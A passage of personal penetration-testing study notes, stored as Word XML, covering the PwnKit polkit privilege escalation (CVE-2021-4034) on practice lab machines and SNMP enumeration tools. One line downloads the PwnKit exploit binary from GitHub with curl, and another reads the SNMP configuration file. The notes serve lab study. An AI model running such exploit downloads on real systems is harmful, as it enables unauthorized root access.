    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003060">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1066">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sybaris</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice (for one writeup, not the other). They used the same </w:t>
      </w:r>
      <w:hyperlink r:id="rId1067">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">github</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as above. But Venkat said in the official writeup there was some compiling debugging stuff we had to do. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003061">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003062">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1943100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="449" name="image466.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image466.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1068"/>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3063">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003064">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003065">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">polkit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a Linux system service that controls which users can perform privileged actions (like rebooting, installing packages) without full root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003066">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pkexec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool that comes with polkit — it lets you run a command as another user (usually root), similar to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but it relies on polkit's authorization rules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003067">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relation:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pkexec uses polkit to check if a user is allowed to elevate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003068">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID + pkexec → root:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pkexec is installed with the SUID bit, meaning it runs as root. If there's a vulnerability (like in PwnKit) — e.g., poor input validation — an attacker can exploit it to execute arbitrary code as root, bypassing normal polkit checks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003069">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—--------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000306A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It was manually exploited in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1069">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Djinn3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play. They found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/pwnkit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID privileges</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and knew to exploit it with this CVE. This is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-4034 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000306B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000306C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This polkit I use for privilege escalation "</w:t>
      </w:r>
      <w:hyperlink r:id="rId1070">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/ly4k/PwnKit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000306D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000306E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—-----------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000306F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003070">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LinPeas found it in the SunsetDecoy PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003071">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1790700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="32" name="image38.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image38.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1071"/>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3072">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="630"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From LinPeas, we can see that this box (which is </w:t>
      </w:r>
      <w:hyperlink r:id="rId1072">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetDecoy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play) is vulnerable to PwnKit exploit. Not all walkthroughs used this exploit, just fyi, so don't be surprised if you see a walkthrough that doesn't use this. But this specific link does. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003073">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="630"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003074">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003075">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000307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077">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003078">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003079">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rt5pcwcpee7n" w:id="428"/>
      <w:bookmarkEnd w:id="428"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000307A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000307B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP Enumeration taught in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX 6.4.6. SNMP Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onesixtyone </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000307C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000307D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Autorecon runs both onesixtytone (to find community strings) and snmpwalk (for more enumeration of the specific community strings).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000307E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000307F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacktricks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003080">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1334"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1073">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://secybr.com/posts/snmp-pentesting-best-practicies/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003081">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1334"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Official hacktricks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003082">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1334"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1074">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-snmp/index.html?highlight=snmp#1611621016110162udp---pentesting-snmp</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003083">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003084">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003085">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iefx5bywxtrd" w:id="429"/>
      <w:bookmarkEnd w:id="429"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP Config Files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003086">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003087">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Examine SNMP Configuration files (from </w:t>
      </w:r>
      <w:hyperlink r:id="rId1075">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hacktrick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003088">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="792"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003089">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="792"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -v '^#' /etc/snmp/snmpd. conf | grep .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000308A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="792"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
